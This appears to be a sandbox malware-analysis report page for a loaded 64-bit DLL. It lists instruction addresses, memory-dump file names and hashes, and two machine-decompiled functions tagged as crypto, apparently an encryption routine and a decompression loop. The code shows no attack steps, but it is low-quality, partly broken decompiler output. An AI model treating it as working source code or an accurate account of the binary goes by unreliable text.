0x7fef3060bee
0x7fef3060bf1
0x7fef3060bf3
0x7fef3060bf7
0x7fef3060bfa
0x7fef3060bfd
0x7fef3060bff
0x7fef3060c03
0x7fef3060c06
0x7fef3060c09
0x7fef3060c0b
0x7fef3060c0e
0x7fef3060c19
0x7fef3060c1b
0x7fef3060c1f
0x7fef3060c22
0x7fef3060c25
0x7fef3060c27
0x7fef3060c2b
0x7fef3060c2e
0x7fef3060c47
0x7fef3060c49
0x7fef3060c52
0x7fef3060c68
0x7fef3060c73
0x7fef3060c76
0x7fef3060c7f
0x7fef3060c83
0x7fef3060c90
0x7fef3060c98
0x7fef3060c9a
0x7fef3060ca5
0x7fef3060cae
0x7fef3060cb1
0x7fef3060cb6
0x7fef3060cb9
0x7fef3060cbb
0x7fef3060cc0
0x7fef3060cc7
0x7fef3060cdd
0x7fef3060ce5
0x7fef3060ced
0x7fef3060cf5
0x7fef3060cf9
0x7fef3060cfc
0x7fef3060cff
0x7fef3060d0a
0x7fef3060d10
0x7fef3060d13
0x7fef3060d1c
0x7fef3060d1f
0x7fef3060d25
0x7fef3060d2d
0x7fef3060d3d
0x7fef3060d43
0x7fef3060d47
0x7fef3060d4a
0x7fef3060d52
0x7fef3060d55
0x7fef3060d5d
0x7fef3060d68
0x7fef3060d80
0x7fef3060d88
0x7fef3060d9d
0x7fef3060da0
0x7fef3060da5
0x7fef3060dae
0x7fef3060db6
0x7fef3060dbe
0x7fef3060dc2
0x7fef3060dca
0x7fef3060dd3
0x7fef3060de7
0x7fef3060dfe
0x7fef3060e05
0x7fef3060e0c
0x7fef3060e13
0x7fef3060e1a
0x7fef3060e25
0x7fef3060e2d
0x7fef3060e38
0x7fef3060e3a
0x7fef3060e42
0x7fef3060e53
0x7fef3060e5a
0x7fef3060e61
0x7fef3060e65
0x7fef3060e6b
0x7fef3060e6f
0x7fef3060e8f
0x7fef3060e91
0x7fef3060e98
0x7fef3060e98
0x7fef3060e9c
0x7fef3060ea3
0x7fef3060ec1
0x7fef3060ec8
0x7fef3060ed3
0x7fef3060ee9
0x7fef3060ef5
0x7fef3060ef8
0x7fef3060efe
0x7fef3060f06
0x7fef3060f1e
0x7fef3060f23
0x7fef3060f2b
0x7fef3060f33
0x7fef3060f38
0x7fef3060f3e
0x7fef3060f54
0x7fef3060f5b
0x7fef3060f62
0x7fef3060f69
0x7fef3060f79
0x7fef3060f80
0x7fef3060f80
0x7fef3060f84
0x7fef3060f8b
0x7fef3060f8d
0x7fef3060f95
0x7fef3060f9f
0x7fef3060fa6
0x7fef3060fad
0x7fef3060fad
0x7fef3060fb1
0x7fef3060fb4
0x7fef3060fb8
0x7fef3060fc2
0x7fef3060fe9
0x7fef3060ff1
0x7fef3060ff8
0x7fef3060ff8
0x7fef3060ffc
0x7fef3061003
0x7fef306100c
0x7fef3061033
0x7fef306103a
0x7fef306103a
0x7fef306103e
0x7fef3061045
0x7fef3061051
0x7fef3061059
0x7fef3061060
0x7fef306107e
0x7fef3061097
0x7fef30610a8
0x7fef30610bb
0x7fef30610c2
0x7fef30610c4
0x7fef30610d6
0x7fef30610eb
0x7fef30610f2
0x7fef30610f7
0x7fef30610ff
0x7fef3061101
0x7fef3061109
0x7fef306112c
0x7fef3061137
0x7fef3061139
0x7fef306113d
0x7fef3061140
0x7fef3061142
0x7fef3061156
0x7fef306115c
0x7fef3061160
0x7fef3061163
0x7fef3061167
0x7fef3061177
0x7fef3061188
0x7fef306118c
0x7fef306118f
0x7fef30611a6

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 627fe258fb92b63b8ec72114e6934a95ffe3c66d4a750ee859bcf0ed1c77ebc9
Instruction ID: 588aa9861b3b83916f71bdd78080eb41862771c81cd446bf030abfccde9e8010
Opcode Fuzzy Hash: 627fe258fb92b63b8ec72114e6934a95ffe3c66d4a750ee859bcf0ed1c77ebc9
Instruction Fuzzy Hash: 8F02F972B0C3C58BE7A48F19E4447AAB7D6F384794F148236DA9957BD8DA3CE441EB00

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF3065765 Relevance: .4, Instructions: 402
COMMONCrypto

Download Yara Rule

C-Code - Quality: 41%

			E000007FE7FEF3065765(long long __rcx, intOrPtr* __rdx, intOrPtr* __r8, void* __r9) {
				void* __rbx;
				void* __rbp;
				void* __r12;
				void* __r13;
				intOrPtr _t55;
				signed int _t63;
				void* _t64;
				signed long long _t67;
				long long* _t107;
				long long _t117;
				intOrPtr* _t118;
				intOrPtr* _t119;
				void* _t120;
				void* _t121;
				signed long long _t122;
				signed long long _t123;
				void* _t138;
				void* _t139;
				long long _t142;
				signed long long _t144;
				void* _t145;
				signed long long _t146;

				_t122 = _t121 - 0x4b8;
				_t120 = _t122 + 0x80;
				_t123 = _t122 & 0xffffffc0;
				if ( *__rdx != 1) goto 0xf3065a42;
				_t118 = __r8;
				_t112 = __rdx + 4;
				_t63 =  *0xf319cfce & 0x00000008;
				if (_t63 != 0) goto 0xf30659dc;
				 *((long long*)(_t123 + 0x58)) = __rcx;
				asm("xorps xmm0, xmm0");
				asm("movaps [ebx+0x10], xmm0");
				asm("movaps [ebx], xmm0");
				_t67 = _t123 + 0x280;
				 *_t67 = 0;
				 *((long long*)(_t67 + 4)) =  *__r8;
				 *((intOrPtr*)(_t67 + 0xc)) =  *((intOrPtr*)(__r8 + 8));
				 *(_t123 + 0x20) = _t67;
				r8d = 0x20;
				0xf30cb4c0();
				asm("movaps xmm0, [ebx]");
				asm("movaps xmm1, [ebx+0x10]");
				asm("movaps [esp+0x70], xmm1");
				asm("movaps [esp+0x60], xmm0");
				asm("movaps [ebx+0x10], xmm1");
				asm("movaps [ebx], xmm0");
				r8d = 0x200;
				E000007FE7FEF30F24C0();
				E000007FE7FEF30E7FD0(_t67, _t123 + 0x280, _t123 + 0x80, _t138);
				r14d = r13d;
				r14d = r14d & 0x0000000f;
				_t144 =  *(_t120 + 0x4a0) & 0xfffffff0;
				if (_t63 == 0) goto 0xf306586a;
				E000007FE7FEF30E8090(_t123 + 0x280, _t123 + 0x280, __r9, _t144, __rdx + 4, _t138, __r9, _t144);
				_t64 = _t145;
				if (_t64 == 0) goto 0xf30658c1;
				r8d = 0x10;
				E000007FE7FEF30F24C0();
				E000007FE7FEF30F1E10();
				asm("movups xmm0, [ebx]");
				asm("movaps [edx], xmm0");
				r8d = 0x10;
				E000007FE7FEF30E8090(_t123 + 0x80, _t123 + 0x280, _t123 + 0x60, _t145, _t112, _t138, __r9 + _t144, _t144);
				 *((intOrPtr*)(_t123 + 0x80)) = 1;
				 *((long long*)(_t123 + 0x84)) =  *_t118;
				 *((intOrPtr*)(_t123 + 0x8c)) =  *((intOrPtr*)(_t118 + 8));
				 *(_t123 + 0x20) = _t123 + 0x80;
				_t146 =  *((intOrPtr*)(_t120 + 0x4b0));
				0xf30cb4c0();
				if (_t64 == 0) goto 0xf3065928;
				E000007FE7FEF30E8090(_t123 + 0x80, _t123 + 0x280,  *((intOrPtr*)(_t120 + 0x4a8)), _t146 & 0xfffffff0, _t112, _t138, __r9 + _t144, _t144);
				_t142 =  *(_t120 + 0x4a0);
				if (_t118 == 0) goto 0xf306598b;
				r8d = 0x10;
				E000007FE7FEF30F24C0();
				E000007FE7FEF30F1E10();
				asm("movups xmm0, [edi]");
				asm("movaps [edx], xmm0");
				r8d = 0x10;
				E000007FE7FEF30E8090( *((intOrPtr*)(_t123 + 0x58)), _t123 + 0x280, _t123 + 0x60, _t118, _t112, _t138, _t142, _t144);
				_t107 = _t123 + 0x80;
				 *_t107 = _t142;
				 *(_t107 + 8) = _t146;
				_t119 = _t123 + 0x280;
				r8d = 0x10;
				E000007FE7FEF30E8090( *((intOrPtr*)(_t123 + 0x58)), _t119, _t107, _t118, _t112, _t138, _t142, _t144);
				r8d = 0x200;
				E000007FE7FEF30F1E10();
				asm("xorps xmm0, xmm0");
				asm("movups [ebx], xmm0");
				E000007FE7FEF30E7E10(_t123 + 0x80,  *((intOrPtr*)(_t123 + 0x58)), _t123 + 0x80,  *((intOrPtr*)(_t123 + 0x58)), _t112, _t139);
				goto 0xf3065a2b;
				asm("movups xmm0, [edi]");
				asm("movups xmm1, [edi+0x10]");
				_t117 = _t123 + 0x80;
				asm("movaps [edi+0x10], xmm1");
				asm("movaps [edi], xmm0");
				 *((long long*)(_t117 + 0x24)) =  *_t119;
				_t55 =  *((intOrPtr*)(_t119 + 8));
				 *((intOrPtr*)(_t117 + 0x2c)) = _t55;
				 *((intOrPtr*)(_t117 + 0x20)) = 0;
				asm("xorps xmm0, xmm0");
				asm("movaps [edi+0x30], xmm0");
				 *((long long*)(_t123 + 0x28)) = _t117;
				 *(_t123 + 0x20) = _t144;
				0xf30cfc80();
				asm("movaps xmm0, [edi]");
				asm("movups [ebx], xmm0");
				return _t55;
			}

0x7fef3065771
0x7fef3065778
0x7fef3065780
0x7fef3065787
0x7fef3065790
0x7fef30657ae
0x7fef30657b2
0x7fef30657b9
0x7fef30657bf
0x7fef30657c4
0x7fef30657cf
0x7fef30657d3
0x7fef30657d6
0x7fef30657de
0x7fef30657e7
0x7fef30657ee
0x7fef30657f1
0x7fef30657f6
0x7fef3065805
0x7fef306580a
0x7fef306580d
0x7fef3065811
0x7fef3065816
0x7fef306581b
0x7fef306581f
0x7fef306582a
0x7fef3065835
0x7fef3065845
0x7fef306584a
0x7fef306584d
0x7fef3065851
0x7fef3065855
0x7fef3065865
0x7fef306586a
0x7fef306586d
0x7fef3065872
0x7fef3065888
0x7fef306589e
0x7fef30658a3
0x7fef30658ab
0x7fef30658b6
0x7fef30658bc
0x7fef30658c1
0x7fef30658cf
0x7fef30658da
0x7fef30658e9
0x7fef30658f4
0x7fef3065901
0x7fef3065913
0x7fef3065923
0x7fef3065930
0x7fef3065937
0x7fef306593c
0x7fef3065952
0x7fef3065968
0x7fef306596d
0x7fef3065975
0x7fef3065980
0x7fef3065986
0x7fef306598b
0x7fef3065993
0x7fef3065996
0x7fef306599a
0x7fef30659a2
0x7fef30659ab
0x7fef30659b8
0x7fef30659c4
0x7fef30659c9
0x7fef30659cc
0x7fef30659d5
0x7fef30659da
0x7fef30659dc
0x7fef30659df
0x7fef30659e3
0x7fef30659eb
0x7fef30659ef
0x7fef30659f5
0x7fef30659f9
0x7fef30659fc
0x7fef30659ff
0x7fef3065a06
0x7fef3065a09
0x7fef3065a0d
0x7fef3065a12
0x7fef3065a20
0x7fef3065a25
0x7fef3065a28
0x7fef3065a41

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd5a397235de83160ae3ac1b15a4218f1b262057b58db0db82308011e0a7142d
Instruction ID: e0dc0965964c8ff3e2c87cb6af45bb0ec5b5332dfa61ebde8c36661d449c5665
Opcode Fuzzy Hash: fd5a397235de83160ae3ac1b15a4218f1b262057b58db0db82308011e0a7142d
Instruction Fuzzy Hash: BC02A376A08AD185E7A08F25E5443EAA7A5FB84BD4F048212DF9C13B99EF3CD295D700

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF305FA98 Relevance: .4, Instructions: 389
COMMONCrypto

Download Yara Rule

C-Code - Quality: 55%

			E000007FE7FEF305FA98(char __ebx, signed int __esi, void* __rcx, signed int __rdx, void* __r8, signed int __r9, void* __r10, void* __r11, void* __r12, signed long long __r13, void* __r14, signed int __r15) {
				signed int _t496;
				signed int _t499;
				signed int _t504;
				signed int _t508;
				signed char _t509;
				signed char _t510;
				signed int _t512;
				signed int _t513;
				signed int _t514;
				signed char _t515;
				signed char _t522;
				signed int _t530;
				signed int _t533;
				signed int _t536;
				unsigned int _t541;
				signed int _t542;
				short _t544;
				signed int _t558;
				signed short _t560;
				signed int _t561;
				signed int _t563;
				signed int _t571;
				signed short _t573;
				signed char _t582;
				signed int _t588;
				signed int _t591;
				unsigned int _t595;
				signed int _t624;
				signed char _t626;
				signed int _t630;
				signed char _t631;
				signed int _t640;
				signed char _t647;
				char _t649;
				signed char _t652;
				signed char _t656;
				signed char _t657;
				signed char _t660;
				unsigned int _t679;
				signed int _t680;
				short _t682;
				signed char _t697;
				signed char _t699;
				signed int _t703;
				signed int _t704;
				signed char _t706;
				signed char _t712;
				signed int _t716;
				signed char _t720;
				signed int _t723;
				signed char _t742;
				unsigned int _t749;
				signed char _t751;
				signed int _t761;
				signed int _t772;
				signed int _t785;
				signed int _t786;
				signed int _t792;
				signed int _t798;
				signed short _t800;
				signed int _t802;
				signed short _t805;
				signed int _t810;
				signed int _t811;
				signed short _t814;
				void* _t818;
				signed int _t821;
				signed int _t827;
				signed int _t834;
				signed int _t837;
				signed int _t840;
				signed char _t842;
				signed int _t849;
				signed int _t865;
				signed int _t867;
				signed int _t891;
				signed int _t894;
				void* _t904;
				void* _t907;
				void* _t910;
				void* _t921;
				signed short _t932;
				void* _t937;
				void* _t940;
				void* _t963;
				signed int _t973;
				void* _t975;
				void* _t1004;
				short _t1012;
				void* _t1017;
				signed int _t1045;
				signed int _t1046;
				void* _t1050;
				void* _t1053;
				void* _t1055;
				signed int _t1063;
				intOrPtr _t1066;
				void* _t1071;
				signed long long _t1074;
				signed long long _t1078;
				signed long long _t1079;
				signed long long _t1085;
				signed long long _t1086;
				long long _t1102;
				signed int _t1111;
				signed long long _t1112;
				signed long long _t1113;
				signed long long _t1117;
				signed long long _t1118;
				signed long long _t1119;
				signed long long _t1120;
				signed long long _t1121;
				signed long long _t1122;
				signed long long _t1123;
				signed long long _t1125;
				void* _t1126;
				long long* _t1133;
				unsigned long long _t1135;
				signed long long _t1137;
				unsigned long long _t1140;
				unsigned long long _t1144;
				void* _t1148;
				long long _t1149;
				signed long long _t1151;
				signed long long _t1155;
				signed long long _t1156;
				signed long long _t1169;
				signed long long _t1173;
				intOrPtr _t1181;
				void* _t1183;
				long long _t1186;
				signed long long _t1187;
				intOrPtr _t1188;
				signed long long _t1190;
				signed long long _t1195;
				signed char* _t1203;
				signed long long _t1206;
				unsigned long long _t1210;
				signed long long _t1214;
				unsigned long long _t1215;
				signed long long _t1223;
				unsigned long long _t1226;
				unsigned long long _t1227;
				intOrPtr _t1236;
				signed long long _t1241;
				unsigned long long _t1243;
				signed long long _t1250;
				signed long long _t1251;
				signed long long _t1255;
				signed long long _t1259;
				signed long long _t1263;
				intOrPtr _t1264;
				void* _t1266;
				signed long long _t1275;
				void* _t1280;
				signed long long _t1283;
				long long _t1284;
				void* _t1285;
				signed long long _t1288;
				signed char* _t1293;
				signed char* _t1300;
				signed char* _t1305;
				signed long long _t1308;
				signed long long _t1309;
				signed long long _t1310;
				signed long long _t1312;
				void* _t1317;
				signed long long _t1328;
				void* _t1330;
				signed long long _t1335;
				signed long long _t1336;
				void* _t1337;
				void* _t1338;
				long long _t1339;
				void* _t1343;
				signed long long _t1346;
				void* _t1348;
				intOrPtr _t1355;
				intOrPtr _t1358;
				long long _t1361;
				signed char* _t1364;
				intOrPtr _t1367;
				intOrPtr _t1368;
				intOrPtr _t1369;
				intOrPtr _t1370;
				intOrPtr _t1371;
				intOrPtr _t1373;
				signed long long _t1374;
				intOrPtr _t1378;
				long long _t1381;
				signed char* _t1384;
				signed long long _t1392;
				signed char* _t1395;
				intOrPtr* _t1399;
				signed char* _t1403;
				signed char* _t1404;
				signed char* _t1405;
				signed char* _t1406;
				signed char* _t1407;
				void* _t1411;
				void* _t1414;
				void* _t1415;
				void* _t1419;
				void* _t1420;
				signed int* _t1421;
				signed long long _t1427;

				_t496 =  *(_t1330 + 0x40);
				_t792 =  *(_t1330 + 0x50);
				if (_t496 - 4 >= 0) goto 0xf3060587;
				_t647 =  *(_t1330 + 0x38);
				if (_t647 == 0) goto 0xf305faf2;
				if (_t647 - 8 >= 0) goto 0xf305fb09;
				if (__r14 == __r15) goto 0xf305fae4;
				_t1195 = __rdx << _t647;
				_t1135 =  *(_t1330 + 0x30) | _t1195;
				 *(_t1330 + 0x30) = _t1135;
				 *(_t1330 + 0x38) = _t647 + 8;
				r12d = 0;
				_t1399 = __r14 + 1;
				goto 0xf305faea;
				r12d = _t792;
				if ((r12b & 0x00000002) == 0) goto 0xf305fab9;
				goto 0xf305fb37;
				if (_t1399 == __r15) goto 0xf305fb31;
				_t649 =  *_t1399;
				 *((char*)(__r10 + _t1195 + 0x291d)) = _t649;
				goto 0xf305fb26;
				 *(_t1330 + 0x30) = _t1135 >> 8;
				 *(_t1330 + 0x38) = _t649 + 0xfffffff8;
				 *((char*)(__r10 + __rcx + 0x291d)) = __ebx;
				 *(_t1330 + 0x40) = _t496 + 1;
				r12d = 0;
				goto 0xf305fb37;
				r12d = _t792;
				if (r12b == 0) goto 0xf305faa0;
				if ((r12b & 0xffffffff) == 1) goto 0xf30606d0;
				r12b = 0x14;
				if ( *(_t1330 + 0x40) == 0) goto 0xf305f43b;
				r12b = 7;
				_t904 = __r8 -  *((intOrPtr*)(_t1330 + 0x1a8));
				if (_t904 != 0) goto 0xf305f43b;
				_t1280 = __r15 - __r15;
				if (_t904 == 0) goto 0xf30611fa;
				_t1066 =  *((intOrPtr*)(_t1330 + 0x1a8));
				_t1262 =  >=  ? _t1280 : _t1066 - __r8;
				_t1263 =  >=  ? __r15 :  >=  ? _t1280 : _t1066 - __r8;
				_t907 = _t1263 - _t1280;
				if (_t907 > 0) goto 0xf3061395;
				_t1137 = _t1263 + __r8;
				if (_t907 < 0) goto 0xf30613a4;
				if (_t1137 - _t1066 > 0) goto 0xf30613b3;
				E000007FE7FEF30F1E10();
				_t1403 =  <=  ? __r15 : __r15 + _t1263;
				_t849 =  *(_t1330 + 0x40) - _t792;
				 *(_t1330 + 0x40) = _t849;
				r12b = 6;
				_t1335 = _t1137;
				_t1367 =  *((intOrPtr*)(_t1330 + 0x58));
				 *(_t1330 + 0x70) = _t1335;
				_t652 =  *(_t1330 + 0x38);
				r8d =  *(_t1330 + 0x40);
				_t910 = r8d - 3;
				if (_t910 >= 0) goto 0xf30605ce;
				 *(_t1330 + 0x80) = 0x5;
				 *(_t1330 + 0x88) = 4;
				r9d = r8d;
				_t499 =  *(_t1330 + 0x80 + __r9 * 4);
				_t1300 = _t1403;
				if (_t910 >= 0) goto 0xf305fc89;
				if (_t1300 == __r15) goto 0xf305fc7b;
				_t626 =  *_t1300 & 0x000000ff;
				_t1140 =  *(_t1330 + 0x30) << _t652 |  *(_t1330 + 0x30);
				 *(_t1330 + 0x30) = _t1140;
				 *(_t1330 + 0x38) = _t652 + 8;
				r12d = 0;
				_t1404 =  &(_t1300[1]);
				goto 0xf305fc81;
				r12d =  *(_t1330 + 0x50);
				if ((r12b & 0x00000002) == 0) goto 0xf305fc4c;
				goto 0xf305fcc8;
				 *(_t1330 + 0x30) = _t1140 >> _t499;
				 *(_t1330 + 0x38) = _t652 - _t499;
				 *((intOrPtr*)(_t1367 + 0x30 + __r9 * 4)) = ( *(0xf311f0f8 + __r9 * 2) & 0x0000ffff) + (__esi &  !_t849);
				r8d = r8d + 1;
				 *(_t1330 + 0x40) = r8d;
				r12d = 0;
				if (r12b == 0) goto 0xf305fc10;
				r12d = r12d >> 8;
				if ((r12b & 0xffffffff) == 1) goto 0xf30605fb;
				if ( *(_t1330 + 0x40) -  *(_t1367 + 0x38) >= 0) goto 0xf305fd3a;
				_t656 =  *(_t1330 + 0x38);
				_t1305 = _t1404;
				if (_t656 - 3 >= 0) goto 0xf305fd6b;
				if (_t1305 == __r15) goto 0xf305fd2c;
				_t1144 =  *(_t1330 + 0x30) | __r15 << _t656;
				 *(_t1330 + 0x30) = _t1144;
				_t657 = _t656 + 8;
				 *(_t1330 + 0x38) = _t657;
				r12d = 0;
				_t1405 =  &(_t1305[1]);
				goto 0xf305fd32;
				r12d =  *(_t1330 + 0x50);
				if ((r12b & 0x00000002) == 0) goto 0xf305fd01;
				goto 0xf305fda6;
				 *(_t1367 + 0x38) = 0x13;
				_t1283 = _t1335;
				_t504 = E000007FE7FEF3061920(0xf311f0f8, _t1367, _t1330 + 0x30, _t1335, _t1367);
				_t1336 = _t1283;
				_t1378 =  *((intOrPtr*)(_t1330 + 0x1a0));
				_t1368 =  *((intOrPtr*)(_t1330 + 0x58));
				r12d = _t504;
				goto 0xf305fda6;
				 *(_t1330 + 0x30) = _t1144 >> 3;
				 *(_t1330 + 0x38) = _t657 + 0xfffffffd;
				if (_t504 - 0x13 >= 0) goto 0xf30612c6;
				 *(_t1368 + 0x7fef31212c4) = _t626 & 0x00000007;
				 *(_t1330 + 0x40) = _t504 + 1;
				r12d = 0;
				if (r12b == 0) goto 0xf305fceb;
				_t921 = (r12b & 0xffffffff) - 1;
				if (_t921 == 0) goto 0xf30606d0;
				_t660 =  *(_t1330 + 0x38);
				_t1203 = _t1405;
				if (_t921 >= 0) goto 0xf30604e6;
				if (_t1203 == __r15) goto 0xf305fe03;
				_t1308 = __r15 << _t660;
				 *(_t1330 + 0x30) =  *(_t1330 + 0x30) | _t1308;
				 *(_t1330 + 0x38) = _t660 + 8;
				_t1406 =  &(_t1203[1]);
				goto 0xf305fe08;
				if ((bpl & 0x00000002) == 0) goto 0xf305fdd5;
				_t1206 =  *((intOrPtr*)(_t1330 + 0x1a8));
				_t1169 = __r15 - _t1406;
				if (_t1169 - 4 < 0) goto 0xf306060d;
				_t1071 = _t1206 - _t1336;
				if (_t1071 - 2 < 0) goto 0xf306060d;
				if (_t1071 - 0x103 < 0) goto 0xf305fe4d;
				if (_t1169 - 0xd > 0) goto 0xf3060750;
				_t508 =  *(_t1330 + 0x38);
				if (_t1071 - 0x1e >= 0) goto 0xf305fe76;
				_t1407 =  &(_t1406[4]);
				 *(_t1330 + 0x30) = _t1206 << _t508 |  *(_t1330 + 0x30);
				_t509 = _t508 + 0x20;
				 *(_t1330 + 0x38) = _t509;
				goto 0xf305fe7b;
				_t798 =  *((short*)(_t1368 + 0x3c + _t1169 * 2));
				if (_t798 < 0) goto 0xf305fea3;
				if ((_t798 & 0x0000ffff) - 0x200 < 0) goto 0xf306073e;
				goto 0xf305fecf;
				asm("dec eax");
				asm("adc edi, 0x0");
				if ( !_t798 - 0x23f > 0) goto 0xf30611c7;
				_t800 =  *((short*)(_t1368 + 0x83c + _t1263 * 2));
				_t932 = _t800;
				if (_t932 < 0) goto 0xf305fea8;
				 *(_t1330 + 0x40) = _t800 & 0x0000ffff;
				_t1210 =  *(_t1330 + 0x30) >> 0xb;
				 *(_t1330 + 0x30) = _t1210;
				_t510 = _t509 - 0xb;
				 *(_t1330 + 0x38) = _t510;
				r12b = 0x15;
				asm("bt edi, 0x8");
				if (_t932 < 0) goto 0xf305f43b;
				_t827 =  *((short*)(_t1368 + 0x3c + _t1169 * 2));
				if (_t827 < 0) goto 0xf305ff16;
				if ((_t827 & 0x0000ffff) - 0x200 < 0) goto 0xf306073e;
				goto 0xf305ff42;
				asm("dec eax");
				asm("adc esi, 0x0");
				if ( !_t827 - 0x23f > 0) goto 0xf3061207;
				if ( *((short*)(_t1368 + 0x83c + _t1283 * 2)) < 0) goto 0xf305ff1b;
				 *(_t1330 + 0x30) = _t1210 >> 0xb;
				 *(_t1330 + 0x38) = _t510 - 0xb;
				_t937 = _t1336 -  *((intOrPtr*)(_t1330 + 0x1a8));
				if (_t937 >= 0) goto 0xf3061284;
				 *((intOrPtr*)(_t1378 + _t1336)) = dil;
				asm("bt esi, 0x8");
				if (_t937 < 0) goto 0xf3060a8e;
				if (_t1336 + 1 -  *((intOrPtr*)(_t1330 + 0x1a8)) >= 0) goto 0xf30612a2;
				 *((intOrPtr*)(_t1378 + _t1336 + 1)) = sil;
				_t1337 = _t1336 + 2;
				_t512 =  *(_t1330 + 0x40);
				r12b = 0x15;
				if (_t512 - 0xff > 0) goto 0xf305f43b;
				_t940 = _t1337 -  *((intOrPtr*)(_t1330 + 0x1a8));
				if (_t940 == 0) goto 0xf3061262;
				if (_t940 >= 0) goto 0xf3061284;
				 *(_t1378 + _t1337) = _t512;
				_t1338 = _t1337 + 1;
				r12b = 0xc;
				_t513 =  *(_t1330 + 0x38);
				if (_t513 - 0xe > 0) goto 0xf30600a1;
				_t1173 = __r15 - _t1407;
				if (_t1173 - 1 > 0) goto 0xf3060085;
				_t679 =  *((short*)(_t1368 + 0xddc + _t1173 * 2));
				if (_t679 < 0) goto 0xf3060019;
				if ((_t679 & 0x0000ffff) - 0x200 < 0) goto 0xf3060056;
				_t680 = _t679 >> 9;
				if (_t513 - _t680 < 0) goto 0xf3060056;
				goto 0xf30600a1;
				if (_t513 - 0xb < 0) goto 0xf3060056;
				asm("dec eax");
				asm("adc ecx, 0x0");
				if ( !_t680 - 0x23f > 0) goto 0xf30611b9;
				_t682 =  *((short*)(_t1368 + 0x15dc + _t1173 * 2));
				if (_t682 >= 0) goto 0xf3060051;
				if (_t513 - 0xc >= 0) goto 0xf3060023;
				if (_t682 >= 0) goto 0xf30600a1;
				if (_t1407 == __r15) goto 0xf3060156;
				_t1309 = _t1308 << _t513;
				_t1214 =  *(_t1330 + 0x30) | _t1309;
				 *(_t1330 + 0x30) = _t1214;
				_t514 = _t513 + 8;
				 *(_t1330 + 0x38) = _t514;
				if (_t514 - 0xe <= 0) goto 0xf305ffed;
				goto 0xf30600a1;
				_t1310 = _t1309 << _t514;
				_t1215 = _t1214 | _t1310;
				 *(_t1330 + 0x30) = _t1215;
				_t515 = _t514 + 0x10;
				 *(_t1330 + 0x38) = _t515;
				_t802 =  *((short*)(_t1368 + 0xddc + _t1173 * 2));
				if (_t802 < 0) goto 0xf30600c3;
				goto 0xf30600ef;
				asm("dec eax");
				asm("adc edi, 0x0");
				if ( !(_t802 & 0x000001ff) - 0x23f > 0) goto 0xf30611c7;
				_t805 =  *((short*)(_t1368 + 0x15dc + _t1263 * 2));
				if (_t805 < 0) goto 0xf30600c8;
				if (0xa == 0) goto 0xf30606cb;
				 *(_t1330 + 0x30) = _t1215 >> 0xb;
				 *(_t1330 + 0x38) = _t515 - 0xb;
				if ((_t805 & 0x0000ffff) - 0x1d > 0) goto 0xf306013e;
				 *(_t1330 + 0x44) =  *(_t1263 + 0xf311ef48) & 0x000000ff;
				 *(_t1330 + 0x3c) =  *(0xf311ef68 + _t1263 * 2) & 0x0000ffff;
				_t695 =  ==  ? 0x1601 : 0x1001;
				r12d = 0x2101;
				r12d = r12d & 0x00003700;
				_t959 =  ==  ? 0x1601 : 0x1001;
				if (( ==  ? 0x1601 : 0x1001) == 0) goto 0xf305ffd4;
				goto 0xf3060485;
				r12d =  *(_t1330 + 0x7c);
				goto 0xf3060149;
				_t697 =  *(_t1330 + 0x38);
				_t630 =  *(_t1330 + 0x50);
				if (_t697 - 8 >= 0) goto 0xf3060565;
				if (__r15 == __r15) goto 0xf306019f;
				 *(_t1330 + 0x30) =  *(_t1330 + 0x30) | _t1310 << _t697;
				 *(_t1330 + 0x38) = _t697 + 8;
				_t1411 = __r15 + 1;
				goto 0xf30601a4;
				if ((bpl & 0x00000002) == 0) goto 0xf3060172;
				_t1074 =  *((intOrPtr*)(_t1330 + 0x1a8));
				_t963 = _t1338 - _t1074;
				if (_t963 == 0) goto 0xf3061238;
				if (_t963 >= 0) goto 0xf3061284;
				 *((char*)(_t1378 + _t1338)) =  *(_t1330 + 0x3c);
				_t1339 = _t1338 + 1;
				r12d = 0x11;
				r12d =  ==  ? 6 : r12d;
				 *(_t1330 + 0x40) =  *(_t1330 + 0x40) - 1;
				r12d =  ==  ? 6 : r12d;
				 *(_t1330 + 0x70) = __r13;
				r13d =  *(_t1330 + 0x3c);
				_t1312 =  *((intOrPtr*)(_t1330 + 0x1a8));
				if (_t1339 == _t1312) goto 0xf3060b97;
				_t1148 = _t1312 - _t1339;
				_t1284 = _t1339;
				_t1149 =  >=  ? _t1074 : _t1148;
				 *((long long*)(_t1330 + 0x28)) =  *(_t1330 + 0xb8);
				 *((long long*)(_t1330 + 0x20)) = _t1149;
				_t1361 = _t1284;
				E000007FE7FEF30616A0();
				_t1369 =  *((intOrPtr*)(_t1330 + 0x58));
				_t1343 = _t1284 + _t1149;
				r12b = 0xc;
				 *(_t1330 + 0x40) =  *(_t1330 + 0x40) - _t630;
				if (_t1148 != _t1074) goto 0xf3060208;
				_t1392 =  *(_t1330 + 0x70);
				r12b = 3;
				if ( *((intOrPtr*)(_t1369 + 0x18)) == 0) goto 0xf305f43b;
